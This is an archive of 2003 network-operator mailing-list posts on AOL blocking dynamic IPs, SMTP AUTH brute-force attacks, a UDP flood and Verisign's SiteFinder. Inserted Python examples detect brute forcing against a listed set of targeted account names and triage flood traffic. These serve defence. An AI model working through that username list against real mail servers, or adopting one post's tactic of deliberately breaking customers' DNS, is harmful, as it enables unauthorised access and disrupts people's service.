What I was discussing with someone offlist was that AOL has apparently been threatening to disallow connections from dynamic IPs for a while now, and they apparently are starting to follow through with it. Although my IP looks like a dynamic IP, it's a static IP out of a block of /29 (do a whois on 68.78.10.168 and you'll see it belongs to Nathan Drook, one of the people here). This is one of those reasons why I hate DUL lists with a passion. It's not foolproof, and a lot of smaller sites get nailed in this mess. Of course, AOL offers up no way of correcting these listings on their site, the postmaster site of theirs, or via the mail daemon itself.

What's very interesting is that the mail finally does go through after rotating a few dozen times between different MX hosts. What's even more interesting is that when the mail did go through, it went through to an IP which blocked it several times before. I have no idea if it's just because not all of their servers are properly updated yet or not. Who knows. *shrug*

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: AOL mail server problems?
- Original Message -
From: Suresh Ramasubramanian [EMAIL PROTECTED]
To: Brian Bruns [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Sunday, October 12, 2003 2:39 PM
Subject: Re: AOL mail server problems?

When it comes to a choice between letting in the ~ 1% of small businesses and linux geeks on dialup + dynamic DNS, and letting in all the direct to MX spam and virus mail that is ~ 99% of the traffic from dynamic IP space, I'll surely take the choice of blocking dynamic IPs, thank you very much.

Just checked their DUL lookup. My range is not on their list. I guess I'll call them a little later and ask what's up.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: AOL mail server problems?
- Original Message -
From: Joshua Levitsky
To: Brian Bruns
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Suresh Ramasubramanian
Sent: Sunday, October 12, 2003 3:10 PM
Subject: Re: AOL mail server problems?

What is the PTR record for your mail server? If you don't have one or if it reads like a residential one then I've heard of that getting blocked. Also be advised you can contact [EMAIL PROTECTED] or AOL Postmaster HelpDesk at 1-703-265-4670 or 1-888-212-5537. Before you email or call you should try this to verify that you have a PTR and that it doesn't read like a residential. (For example dsl081-214-123.nyc2.dsl.speakeasy.net.)

Ah yeah, we have an Ameritech PTR right now (working on that problem as well). I guess I'll have one of my guys call Ameritech and complain about the PTR.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
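The check Joshua suggests, as an added example (not code from the thread or from AOL): resolve the PTR, confirm it maps back to the address, and grade whether the name reads like an ISP-generated consumer line. The "residential" test is my own heuristic, assumed here, not AOL's actual policy; the sample names are constructed apart from the speakeasy.net example quoted in the reply.

```python
"""Sanity-check a mail server's reverse DNS the way the reply above suggests.

Added example, not code from the thread or from AOL.  The "reads like a
residential line" test is an assumed heuristic: label tokens that ISPs put in
consumer reverse names, plus address octets embedded in the name.
"""
import re
import socket

# Label stems commonly seen in ISP-generated reverse names for consumer lines.
RESIDENTIAL_TOKENS = {"dsl", "adsl", "dial", "dialup", "ppp", "pppoe", "cable",
                      "dyn", "dynamic", "pool", "dhcp", "cust", "client"}


def ptr_for(ip):
    """Reverse-resolve ip; returns the PTR name, or None when there is none."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def embeds_ip(ptr, ip):
    """True when at least two octets of ip appear in ptr, in address order,
    e.g. dsl081-214-123.example.net for 81.214.123.x (zero padding ignored)."""
    nums = [int(n) for n in re.findall(r"\d+", ptr)]
    hits, i = 0, 0
    for octet in (int(o) for o in ip.split(".")):
        while i < len(nums) and nums[i] != octet:
            i += 1
        if i < len(nums):
            hits += 1
            i += 1
    return hits >= 2


def isp_labels(ptr):
    """Labels of ptr that, with digits removed, are a known consumer-line token."""
    found = []
    for label in re.split(r"[.\-_]", ptr.lower()):
        stem = re.sub(r"\d+", "", label)
        if stem in RESIDENTIAL_TOKENS:
            found.append(label)
    return found


def looks_residential(ptr, ip):
    """Return (verdict, reasons); verdict is True when a receiving mail system
    would plausibly treat the name as a dynamic/residential host."""
    if not ptr:
        return True, ["no PTR record"]
    reasons = []
    labels = isp_labels(ptr)
    if labels:
        reasons.append("ISP-style labels: " + ", ".join(labels))
    if embeds_ip(ptr, ip):
        reasons.append("address octets embedded in the name")
    return bool(reasons), reasons


def check_mail_host(ip):
    """Live check: resolve the PTR, confirm it maps back to ip, and grade it."""
    ptr = ptr_for(ip)
    verdict, reasons = looks_residential(ptr, ip)
    forward_ok = False
    if ptr:
        try:
            forward_ok = ip in {a[4][0] for a in socket.getaddrinfo(ptr, None)}
        except socket.gaierror:
            forward_ok = False
    if not forward_ok:
        reasons.append("PTR does not resolve back to the address (no FCrDNS)")
    return {"ip": ip, "ptr": ptr, "residential": verdict, "reasons": reasons}


if __name__ == "__main__":
    import sys
    # Constructed default from the documentation range; pass a real address.
    print(check_mail_host(sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"))
```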
Re: New mail blocks result of Ralsky's latest attacks?
Tis one of the reasons why I've disabled SMTP AUTH on all of my servers for now. I've known about this for a few weeks now. It's not surprising. Most of the servers cracked are Exchange servers (probably thanks to weak passwords), but I still don't feel like taking a chance. Exchange does a horrible job of logging, which is why they are probably being targeted. Most real SMTP servers (sendmail, exim, postfix, qmail) log failed attempts in the maillog or via PAM (if they use it).

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Bob German
To: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 10:59 AM
Subject: New mail blocks result of Ralsky's latest attacks?

A colleague informed me this morning that Alan Ralsky is doing widespread bruteforce attacks on SMTP AUTH, and they are succeeding, mainly because it's quick, painless (for him), and servers and IDS signatures don't generally offer protection against them. Could this be why everyone's locking up their mail servers all of a sudden? Does anyone know of a way to stop them?

Bob
Re: New mail blocks result of Ralsky's latest attacks?
Just FYI, I am putting together another paper as we speak on how to secure your mail servers against this type of attack. Should be online by this afternoon at the latest.

Ok, this is where I need to ask for you guys' help as well. If anyone here has experience with postfix or qmail, please let me know if you know ways of securing these mail servers from these kinds of attacks. I'm familiar with sendmail, exim, and Exchange.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Brian Bruns
To: Bob German; [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 11:12 AM
Subject: Re: New mail blocks result of Ralsky's latest attacks?

Tis one of the reasons why I've disabled SMTP AUTH on all of my servers for now. I've known about this for a few weeks now. It's not surprising. Most of the servers cracked are Exchange servers (probably thanks to weak passwords), but I still don't feel like taking a chance. Exchange does a horrible job of logging, which is why they are probably being targeted. Most real SMTP servers (sendmail, exim, postfix, qmail) log failed attempts in the maillog or via PAM (if they use it).

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Bob German
To: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 10:59 AM
Subject: New mail blocks result of Ralsky's latest attacks?

A colleague informed me this morning that Alan Ralsky is doing widespread bruteforce attacks on SMTP AUTH, and they are succeeding, mainly because it's quick, painless (for him), and servers and IDS signatures don't generally offer protection against them. Could this be why everyone's locking up their mail servers all of a sudden? Does anyone know of a way to stop them?

Bob
Fw: New mail blocks result of Ralsky's latest attacks?
This is something I sent to someone offlist. I've stripped out his name, etc.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Brian Bruns
To: X
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 11:35 AM
Subject: Re: New mail blocks result of Ralsky's latest attacks?

Hey XXX,

There are a few ways to lock down an Exchange server. Luckily, I used to be an Exchange admin two years ago, so let me quickly dig up my notebook...

Ok, first, make sure on your Exchange server you have Guest disabled. According to reports, the following usernames are being tested and cracked: abc, web, admin, www, administrator, data, server, backup, master, test, root, webmaster. Basically, if you have any of these accounts active, please make sure they have a strong password on them. Please be careful though when changing them - you'll have to make sure that all services which depend on the account also are updated with the new password.

Second, if you don't use SMTP auth, simply disable it. Open the SMTP virtual server properties under Exchange Server Manager, select the Access tab, click Relay in the Relay restrictions group. Clear the check off of "Allow all computers which successfully authenticate, regardless of the list above". You should be in good shape then.

On a side note (and I do recommend this to my customers), if you want added security, yeah, you are going to want to use a UNIX/Linux box in front of the Exchange server and then relay mail to it. That way, you are less likely to fall victim to Exchange exploits as well. It's not too hard to set up, but takes time.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
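Earlier in this thread the point was made that sendmail, exim, postfix and qmail log failed AUTH attempts, and the forwarded message above lists the account names being tried. The following added example (not code from the thread or from any MTA) ties the two together: it reads exim-style "authenticator failed" lines, assumed here as the format, and reports sources that either burst past a failure threshold or touch one of the listed accounts at all. The log lines are constructed.

```python
"""Spot SMTP AUTH brute forcing in mail logs and flag the accounts named above.

Added example serving both the remark that real MTAs log failed AUTH attempts
and the lockdown advice in the forwarded message; it is not code from the
thread or from any MTA.  The log lines are constructed in an exim-style
format (an assumption; adjust AUTH_FAIL_RE for sendmail, postfix or qmail).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Account names the forwarded message reports as being tried; any failure
# against one of these is reported even below the rate threshold.
WATCHED_ACCOUNTS = {"abc", "web", "admin", "www", "administrator", "data",
                    "server", "backup", "master", "test", "root", "webmaster"}

AUTH_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+ authenticator failed for "
    r"(?:\([^)]*\) )?\[(?P<ip>[^\]]+)\]: 535 [^(]*\(set_id=(?P<user>[^)]*)\)"
)

# Constructed sample: one host walks the watched list quickly, one host makes
# a single typo-style failure, one host tries "administrator" twice.
SAMPLE_LOG = """
2003-10-10 11:35:02 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=admin)
2003-10-10 11:35:05 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=test)
2003-10-10 11:35:07 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=root)
2003-10-10 11:35:09 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=backup)
2003-10-10 11:35:12 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=webmaster)
2003-10-10 11:35:14 plain_login authenticator failed for (mail.example.net) [192.0.2.55]: 535 Incorrect authentication data (set_id=abc)
2003-10-10 11:40:00 plain_login authenticator failed for [198.51.100.9]: 535 Incorrect authentication data (set_id=alice)
2003-10-10 12:01:10 login authenticator failed for (client.example.org) [203.0.113.7]: 535 Incorrect authentication data (set_id=administrator)
2003-10-10 12:03:41 login authenticator failed for (client.example.org) [203.0.113.7]: 535 Incorrect authentication data (set_id=administrator)
2003-10-10 12:05:00 1A9abc-0001xx-00 <= alice@example.net H=(client) [198.51.100.9] P=esmtpa A=plain_login:alice S=812
""".strip().splitlines()


def parse_failures(lines):
    """Map source IP -> sorted list of (timestamp, username) for failed AUTHs."""
    fails = defaultdict(list)
    for line in lines:
        m = AUTH_FAIL_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            fails[m["ip"]].append((ts, m["user"]))
    for evs in fails.values():
        evs.sort()
    return fails


def peak_in_window(times, window):
    """Largest number of events falling inside any span of length `window`."""
    recent, peak = deque(), 0
    for t in times:
        recent.append(t)
        while t - recent[0] > window:
            recent.popleft()
        peak = max(peak, len(recent))
    return peak


def analyse(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: finding} for sources that either exceed `threshold` failures
    inside `window` or touch a watched account at all."""
    findings = {}
    for ip, evs in parse_failures(lines).items():
        reasons = []
        peak = peak_in_window([t for t, _ in evs], window)
        if peak >= threshold:
            reasons.append(f"{peak} failures within {window}")
        users = sorted({u for _, u in evs})
        watched = sorted(set(users) & WATCHED_ACCOUNTS)
        if watched:
            reasons.append("attempts on watched accounts: " + ", ".join(watched))
        if reasons:
            findings[ip] = {"failures": len(evs), "peak": peak,
                            "users": users, "watched": watched,
                            "first": evs[0][0], "last": evs[-1][0],
                            "reasons": reasons}
    return findings


if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_LOG).items():
        print(ip, f["failures"], "failures;", "; ".join(f["reasons"]))
```

The single failure from 198.51.100.9 is deliberately left unreported: a lone bad password on an ordinary account is normal, whereas any attempt on the listed names is worth a look regardless of rate.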
Re: Verisign's public opinion play
Well, I donno about anyone else, but I absolutely suck on the PR end of things. Now, I *am* good at writing documentation for end users (I used to work helldesk). So, my question is, is there any place on the web where we can go, see what's been written up so far, find out what still needs to be written, and get people to fill in the blanks? I know personally I would love to put out a paper, but I have no idea where to begin.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Owen DeLong [EMAIL PROTECTED]
To: Brian Bruns [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Tuesday, October 07, 2003 2:00 AM
Subject: Re: Verisign's public opinion play

I wish it were lack of clue. This is something far more evil than lack of clue, and, the bottom line is that these guys are much better at PR than most of us. Since they can't win on engineering, because they are wrong, they are trying to make it a PR battle instead. They are having some success. We _MUST_ fight this as a PR battle. We _MUST_ write courteous, prompt, and, factual replies to these publications. The more people who do that, the better our side will look. We must point out where Verisign is lying, and, we must concede where they are not. We must clarify where their technically accurate statements lead to wildly inaccurate perceptions.

Owen

--On Monday, October 6, 2003 23:15 -0400 Brian Bruns [EMAIL PROTECTED] wrote:

Wish someone who was good with the clue-axe would take a swing at these dolts. We all know they are crying babies because their new method of profit was shut down. Now, the interesting question will be, how can we prevent them from adding SiteFinder again?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: Kee Hinckley [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, October 06, 2003 11:12 PM
Subject: Verisign's public opinion play

Take your blood pressure medicine before reading this one.

http://news.com.com/2010-1071-5086769.html

Apparently our objections stem from our lingering resentment over the commercial use of the internet. In case you're wondering who the author is, since neither the bio on the page nor Verisign's site is helpful: Mark McLaughlin is a former lawyer who moved into Marketing and Biz Development (Caere, Gemplus, Signio and then Verisign payments).

--
Kee Hinckley
http://www.messagefire.com/ Next Generation Spam Defense
http://commons.somewhere.com/buzz/ Writings on Technology and Society

I'm not sure which upsets me more: that people are so unwilling to accept responsibility for their own actions, or that they are so eager to regulate everyone else's.
Re: an example individual response to Verisign spin
Ok, I've been working on this for a while, it's still v1.1 of the document, so it needs some more work including references and stuff like that. I wrote it in AbiWord, but it didn't translate to HTML so well, will work on getting it better later on tonight. Comments are welcome.

http://www.sosdg.org/papers/VSGNWCD.html

I tried to write it as simple as I could in the hopes it might help end users understand the issues created by the SiteFinder 'service'.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

- Original Message -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, October 07, 2003 2:02 PM
Subject: fyi: an example individual response to Verisign spin

Subject: [IP] Yesterdays WJS article on Versign
http://www.interesting-people.org/archives/interesting-people/200310/msg00057.html

--- Forwarded Message

Date: Tue, 07 Oct 2003 04:45:48 -0400
To: [EMAIL PROTECTED]
From: Dave Farber [EMAIL PROTECTED]
Subject: [IP] Yesterdays WJS article on Versign

Date: Mon, 06 Oct 2003 15:17:34 -0700
From: Dave Crocker [EMAIL PROTECTED]
Subject: Today's WJS article on Versign
To: [EMAIL PROTECTED]
Cc: Nick Wingfield [EMAIL PROTECTED], Dave Farber [EMAIL PROTECTED]

Re: Nick Wingfield's article
http://online.wsj.com/article/0,,SB106519977252395300,00.html?mod=dartTechtoday

Hello,

VeriSign's critics, of course, see it differently, accusing VeriSign of undermining the collectivist culture of the Internet, through which engineers hash out key changes to the network through standards groups. Unlike the Web and e-mail, which have become thoroughly commercialized through advertising, the low-level Internet routing software that VeriSign altered with its new service has remained relatively insulated from efforts to make a profit. ...

Although notably better than most of the articles on this topic, Mr. Wingfield still managed to buy Verisign's spin, both its erroneous facts and its erroneous perspective.

First of all, the service that Verisign runs has been for profit for as long as it has run it. That's roughly ten years. In addition the problems caused by Verisign were not just in the eyes of technologists.

Second of all, consider the service they suddenly changed in terms of its equivalent in the world of telephone. Imagine dialing a non-existent number or asking 411 for the number of a non-existent entry, and not being told that there is no listing. Instead, you are given a phone number that feeds you advertising. Would you view this as a valuable navigational aid for users who might otherwise hit an online dead-end? Probably not.

The problem, here, is not a culture-clash between commercial ventures and naive technologists. Verisign contracted to provide a critical infrastructure service that maps domain names to Internet addresses. The only clash is between responsible and irresponsible approaches to providing that service. If Verisign cannot operate it at a profit, without breaking it, there are others quite willing and able to do the job.

d/
--
Dave Crocker dcrocker-at-brandenburg-dot-com
Brandenburg InternetWorking www.brandenburg.com
Sunnyvale, CA USA tel:+1.408.246.8253

--
Archives at: http://www.interesting-people.org/archives/interesting-people/

--- End of Forwarded Message
DoS Attacks
Oh boy, what a fun night this was. After 4 or so hours of downtime, my servers are back up and running. Here's the gory details.

At about 7pm EST, we began having unusual issues with our network, the router, and several machines on the network. For the first part of the attack, we were held down for a good 30-60 minutes. Took us a while to figure out which one of our machines was being targeted. Turns out to be our NAT firewall box. We tried several things to drop the attack, but it still kept coming in strong (mind you, we don't have very much bandwidth, but we can usually ride out DoS attacks pretty well - this was an exception). Then suddenly, out of the blue it dropped. Outside connectivity was restored and things were back to normal.

20 minutes later, the relentless attack began again. This time, we were ready and waiting with tcpdump and several other handcrafted tools we use for this type of thing. The attack was coming from a single source machine, unspoofed (ballsy if you ask me), 128.186.11.215. Packets were UDP, random from 2100-2299 source and 2400-2699 dest.

So, now for the fun part. Being offsite, I wasn't the one to place the calls, but my admin on site started with FSU's abuse desk. No help whatsoever. Claimed that because the abuse desk was gone, they had no authority to deal with the problem. Frustrated, annoyed, and pissed off, he tried again, and got hung up on twice. Nice people eh?

Our next call was a bit later (at this point, we were very unhappy and ready to start raising hell with anyone we could find) - this time, to their upstream Qwest. After dealing with the operator, they finally sent him to one of the NOCs. Unfortunately, they sent him to the wrong NOC and not the Qwest MD NOC. Luckily, we got someone with a clue - a nice guy by the name of Richard Stein who tried to help us, but found that the other NOC was unresponsive and couldn't do anything himself to solve the problem.

After hanging up with Qwest, we got a call back from FSU. After a good 20 minutes or so of talking with the net admin from FSU, things were finally set in motion. After another good 10 minutes or so, connectivity was restored and everything was back to normal. According to my guy, they yanked the whole subnet at FSU. Problem solved.

So here I am, asking if anyone here has any advice on dealing with these issues in the future? It's painfully apparent no one takes these situations seriously enough. What should we do when we are put in a position like this? Just sit back and hope it goes away itself?

Also, any ideas on how to deal with these attacks on lower bandwidth connections? Right now, 2mbit.com / sosdg.org is sitting on a 1.5/256 business DSL line. I really can't afford to be buying T1s or T3s just to hold up to attacks like this.

As always, thanks.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
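The triage step described in the post above (tcpdump on the victim, then working out which single source and which port ranges are involved) can be scripted. The following is an added example, not one of the "handcrafted tools" from the post: it parses the text output of tcpdump -n udp, picks out the dominant source, reports its source and destination port spread and rate, and builds the host-side iptables drop rule. The capture lines are constructed to look like the attack described (source 128.186.11.215, ports in the 2100-2299 and 2400-2699 ranges); the victim address 192.0.2.10 and the 50% share threshold are assumptions.

```python
"""Triage a UDP flood from a tcpdump text capture (added example).

The constructed sample below imitates 'tcpdump -n udp' output. The attacker
address 128.186.11.215 is the one named in the post; the victim address
192.0.2.10, the timestamps and the packet sizes are assumptions.
"""
import re
from collections import Counter

TCPDUMP_UDP = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): UDP, length (?P<len>\d+)"
)

# Constructed sample: eight flood packets plus two legitimate DNS replies.
SAMPLE_CAPTURE = """\
19:02:11.000100 IP 128.186.11.215.2150 > 192.0.2.10.2501: UDP, length 1400
19:02:11.000250 IP 128.186.11.215.2277 > 192.0.2.10.2688: UDP, length 1400
19:02:11.000400 IP 128.186.11.215.2103 > 192.0.2.10.2413: UDP, length 1400
19:02:11.000550 IP 198.51.100.7.53 > 192.0.2.10.33211: UDP, length 87
19:02:11.000700 IP 128.186.11.215.2299 > 192.0.2.10.2699: UDP, length 1400
19:02:11.000850 IP 128.186.11.215.2180 > 192.0.2.10.2550: UDP, length 1400
19:02:11.001000 IP 128.186.11.215.2100 > 192.0.2.10.2400: UDP, length 1400
19:02:11.001150 IP 198.51.100.7.53 > 192.0.2.10.33212: UDP, length 91
19:02:11.001300 IP 128.186.11.215.2222 > 192.0.2.10.2601: UDP, length 1400
19:02:11.001450 IP 128.186.11.215.2255 > 192.0.2.10.2477: UDP, length 1400
"""


def parse_line(line):
    """Return a dict for one UDP tcpdump line, or None for anything else."""
    m = TCPDUMP_UDP.match(line.strip())
    if not m:
        return None
    pkt = m.groupdict()
    for key in ("sport", "dport", "len"):
        pkt[key] = int(pkt[key])
    return pkt


def _seconds(ts):
    """Convert an HH:MM:SS.ffffff timestamp to seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def triage(capture, threshold=0.5):
    """Find the dominant UDP source and characterise its traffic.

    threshold is the fraction of all UDP packets one source must account
    for before it is flagged (an assumed value). Returns None when no
    single source dominates, so a busy but healthy link is not flagged."""
    pkts = [p for p in (parse_line(l) for l in capture.splitlines()) if p]
    if not pkts:
        return None
    src, n = Counter(p["src"] for p in pkts).most_common(1)[0]
    if n / len(pkts) < threshold:
        return None
    mine = [p for p in pkts if p["src"] == src]
    span = _seconds(mine[-1]["ts"]) - _seconds(mine[0]["ts"])
    return {
        "source": src,
        "packets": n,
        "share": n / len(pkts),
        "bytes": sum(p["len"] for p in mine),
        "sport_range": (min(p["sport"] for p in mine), max(p["sport"] for p in mine)),
        "dport_range": (min(p["dport"] for p in mine), max(p["dport"] for p in mine)),
        "pps": n / span if span > 0 else float("inf"),
    }


def iptables_rule(summary):
    """Host-side drop rule for the flagged source and its destination ports.

    This stops the packets from being processed by the firewall box, but the
    bytes still arrive on the DSL line; only the upstream can filter that."""
    lo, hi = summary["dport_range"]
    return "iptables -I INPUT -p udp -s %s --dport %d:%d -j DROP" % (
        summary["source"], lo, hi)


if __name__ == "__main__":
    summary = triage(SAMPLE_CAPTURE)
    print(summary)
    print(iptables_rule(summary))
```

The rule string is printed rather than executed on purpose: on a 1.5/256 DSL line the point of the summary is mostly to have exact figures (source, port ranges, packets per second) to give the upstream or the source's abuse desk, since dropping at the host does nothing about the inbound bandwidth.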
Re: DoS Attacks
----- Original Message -----
From: Mark Radabaugh [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, October 07, 2003 11:56 PM
Subject: Re: DoS Attacks

I think I would follow two avenues next time - the direct approach with FSU (or wherever the traffic is coming from) as well as with your DSL provider. Your upstream should be able to assist in at least keeping the traffic off of your dedicated line. Whether your DSL provider has the resources to sink the traffic may be another matter -- but they are at least in a position to help you and (since you are paying them) have an interest in dealing with you.

I hate to say this, but Ameritech/SBC is utterly useless in matters like this. I mean, at one point their redback was being nailed, and they didn't seem to care one bit. After 5pm, everyone with a clue seems to leave, and we are left with useless low level help desk techs. Our DSL service isn't bad - in fact it rarely goes down. The problem is that when we need their help with something out of our league, they are completely useless.

Anyone know of a contact number for SBC/Ameritech that would be useful in a case like this?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
Re: Verisign's public opinion play
Wish someone who was good with the clue-axe would take a swing at these dolts. We all know they are crying babies because their new method of profit was shut down.

Now, the interesting question will be, how can we prevent them from adding SiteFinder again?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Kee Hinckley [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, October 06, 2003 11:12 PM
Subject: Verisign's public opinion play

Take your blood pressure medicine before reading this one.
http://news.com.com/2010-1071-5086769.html

Apparently our objections stem from our lingering resentment over the commercial use of the internet.

In case you're wondering who the author is, since neither the bio on the page nor Verisign's site is helpful: Mark McLaughlin is a former lawyer who moved into Marketing and Biz Development (Caere, Gemplus, Signio and then Verisign payments).

--
Kee Hinckley
http://www.messagefire.com/ Next Generation Spam Defense
http://commons.somewhere.com/buzz/ Writings on Technology and Society

I'm not sure which upsets me more: that people are so unwilling to accept responsibility for their own actions, or that they are so eager to regulate everyone else's.
Re: [MEDIA] McLaughlin Defends Site Finder As 'Innovation'
You know who/what this sounds like? Microsoft. When smacked down about IE integration and WMP integration, they screamed bloody murder and claimed freedom of innovation. Exactly what NetSol/Verisign is doing. Maybe they have the same PR firm?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: wayne [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, October 06, 2003 11:14 PM
Subject: [MEDIA] McLaughlin Defends Site Finder As 'Innovation'

As seen on /.
http://news.com.com/2010-1071-5086769.html

Mark McLaughlin, senior VP of Verislime, has an editorial on news.com claiming that ICANN is stifling innovation and forcing the internet to stagnate. The PR machine is out in force and painting anyone who disagrees with them as anti-capitalistic loonies.

-wayne
Re: Trying to subscribe to Sitefinder list
I got on OK, but I used the web based confirmation method. Maybe their mail server got flooded?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Howard C. Berkowitz [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, October 07, 2003 1:41 AM
Subject: Trying to subscribe to Sitefinder list

Well, I've been trying. I got a double opt-in that gave me a deadline to respond of 5AM Wednesday. I replied. No confirmation. Tried to post (crossposted to NANOG). Got error message telling me I was not yet on the list.

Of course, with the apparent assumption the Internet is the Web, the first directions were to use a browser. Another option was to respond with a token in the message, a common enough procedure for mailing lists. I didn't read the fine print well enough. The first time, I discovered that the token had "confirm no" in it. Removed "no". Reread instructions. Just removing wasn't enough. Had to edit it to "confirm yes".

Is there something wrong with the user friendliness of this picture, assuming that people actually use something other than a web browser, shocking as that might be for a m-a-i-l-i-n-g l-i-s-t? <g>
Re: Removal of wildcard A records from .com and .net zones
Here's an interesting question Matt, maybe you can provide me with a worthwhile answer. Last night, I finally got around to registering a .org domain for my use. It took only 20 minutes from the time which I registered it, gave it my DNS servers, and paid for it, to when it was resolvable everywhere in the world. That's *20* minutes. Why does it take NetSol 24/48/72 hours to do the same thing?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Matt Larson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, October 03, 2003 5:50 PM
Subject: Removal of wildcard A records from .com and .net zones

VeriSign was directed by ICANN to suspend the Site Finder service by 0100 UTC on Sunday, October 5. We requested an extension from ICANN to give more notice to the community but were denied.

We will be removing the wildcard A records from the .com and .net zones beginning at 2300 UTC on Saturday, October 4. The former behavior for these zones (returning Name Error/RCODE=3 in response to queries for nonexistent domain names) will be in place by 0100 UTC on Sunday, October.

Matt
--
Matt Larson [EMAIL PROTECTED]
VeriSign Naming and Directory Services
Re: Removal of wildcard A records from .com and .net zones
----- Original Message -----
From: Matt Larson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, October 03, 2003 5:50 PM
Subject: Removal of wildcard A records from .com and .net zones

VeriSign was directed by ICANN to suspend the Site Finder service by 0100 UTC on Sunday, October 5. We requested an extension from ICANN to give more notice to the community but were denied.

We will be removing the wildcard A records from the .com and .net zones beginning at 2300 UTC on Saturday, October 4. The former behavior for these zones (returning Name Error/RCODE=3 in response to queries for nonexistent domain names) will be in place by 0100 UTC on Sunday, October.

Is this supposed to make us feel sorry for you? You broke something very important on the Internet, without asking, without giving any prior notice, and now you expect to get time to give notice that it's going away? I think I speak for most people when I say "Hell no!" The community has wanted this horrible POS hack to go away. We don't want this one day more than necessary. Tell your superiors to find another way to make a quick buck. The Internet and the DNS system is not yours to play with at a whim.

*holds up a glass of vodka* Here's to the good guys winning another battle.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511
Re: Annoying dynamic DNS updates (was Re: someone from attbi please contact me ...)
Paul,

How about just configuring your BIND to return errors when he queries your server? He has got to be using you as either a primary or secondary name server. That would make everything on that machine suddenly come to a grinding halt as nothing would resolve anymore. I used to do that to customers who didn't turn off dynamic DNS updates. It got their attention quick.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.2mbit.com
ICQ: 8077511

----- Original Message -----
From: Paul Vixie [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, September 28, 2003 12:09 PM
Subject: Re: Annoying dynamic DNS updates (was Re: someone from attbi please contact me ...)

